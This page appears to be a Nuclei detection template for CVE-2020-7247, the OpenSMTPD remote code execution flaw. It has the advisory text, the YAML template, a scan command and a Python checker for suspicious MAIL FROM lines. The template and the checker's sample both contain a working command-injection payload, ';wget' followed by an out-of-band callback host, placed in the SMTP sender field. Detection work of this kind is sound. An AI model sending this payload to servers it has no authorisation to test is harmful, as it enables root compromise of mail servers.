OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution
ID: CVE-2020-7247
Severity: critical
Author: princechaddha
Tags: packetstorm,cve,cve2020,js,smtp,opensmtpd,network,rce,oast,kev,openbsd
Description
OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the “uncommented” default configuration. The issue exists because of an incorrect return value upon failure of input validation.
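The description ties the attack to shell metacharacters in the MAIL FROM field. As an added example (not part of the template or of OpenSMTPD), this Python check flags such sender paths in captured SMTP client commands; the metacharacter set, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# RFC 5321 form: MAIL FROM:<reverse-path> [params]; greedy so a '>' inside
# the path is still captured.
MAIL_FROM = re.compile(r"^\s*MAIL FROM:\s*<(.*)>", re.IGNORECASE)

# Heuristic set (assumption): characters a shell interprets and that almost
# never occur in a real mailbox local part.
SHELL_META = set(";|&`$()<>\\\"' \t")


def inspect_mail_from(line):
    """Return None for non-MAIL lines, else a dict describing the sender."""
    m = MAIL_FROM.match(line)
    if m is None:
        return None
    addr = m.group(1)
    local, sep, domain = addr.rpartition("@")
    if not sep:                      # no '@': the whole path is the local part
        local, domain = addr, ""
    return {
        "address": addr,
        "metachars": "".join(sorted(set(local) & SHELL_META)),
        # The empty reverse-path <> is a legitimate bounce sender.
        "no_domain": bool(addr) and not domain,
    }


def scan(lines):
    """Return findings for MAIL FROM commands worth a closer look."""
    hits = []
    for line in lines:
        info = inspect_mail_from(line)
        if info and (info["metachars"] or info["no_domain"]):
            hits.append(info)
    return hits


# Constructed sample: client commands as seen in an SMTP session capture.
SAMPLE = [
    "EHLO client.example.invalid",
    "MAIL FROM:<alice@example.invalid>",
    "MAIL FROM:<>",
    "mail from:<bob@example.invalid> SIZE=2048",
    "MAIL FROM:<;wget oast.example.invalid;>",
    "RCPT TO:<root>",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Several of the flagged characters are legal in an RFC 5321 local part, so treat a hit as a lead to review rather than proof of an attempt.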
YAML Source
id: CVE-2020-7247

info:
  name: OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution
  author: princechaddha
  severity: critical
  description: |
    OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the OpenSMTPD process, potentially leading to a complete compromise of the affected system.
  remediation: OpenBSD users are recommended to install patches for OpenBSD 6.6
  reference:
    - https://www.openwall.com/lists/oss-security/2020/01/28/3
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7247
    - https://github.com/openbsd/src/commit/9dcfda045474d8903224d175907bfc29761dcb45
    - http://www.openwall.com/lists/oss-security/2020/01/28/3
    - http://packetstormsecurity.com/files/156145/OpenSMTPD-6.6.2-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-7247
    cwe-id: CWE-755
    epss-score: 0.97504
    epss-percentile: 0.9998
    cpe: cpe:2.3:a:openbsd:opensmtpd:6.6:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: openbsd
    product: opensmtpd
  tags: packetstorm,cve,cve2020,js,smtp,opensmtpd,network,rce,oast,kev,openbsd

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const smtp = require('nuclei/smtp');
      const client = new smtp.Client(Host,Port);
      const message = new smtp.SMTPMessage();
      message.From(From);
      message.To(To);
      message.Body(Msg);
      Export(client.SendMail(message));

    args:
      Host: "{{Host}}"
      Port: "8825"
      From: ";wget {{interactsh-url}};"
      To: "root"
      Msg: "Contact your security team if you do not expect this message"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: dsl
        dsl:
          - success == true
          # - response == true
        condition: and
# digest: 4a0a00473045022100dbb87b94ccc2e1991b3dcf425dc985b1eb305528d3cd621646c66889faa384bf022072d15648e999ad04c79bfe622ffcc87b351f026efce2851467fcde92c30f298c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect the vulnerability described above. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "javascript/cves/2020/CVE-2020-7247.yaml"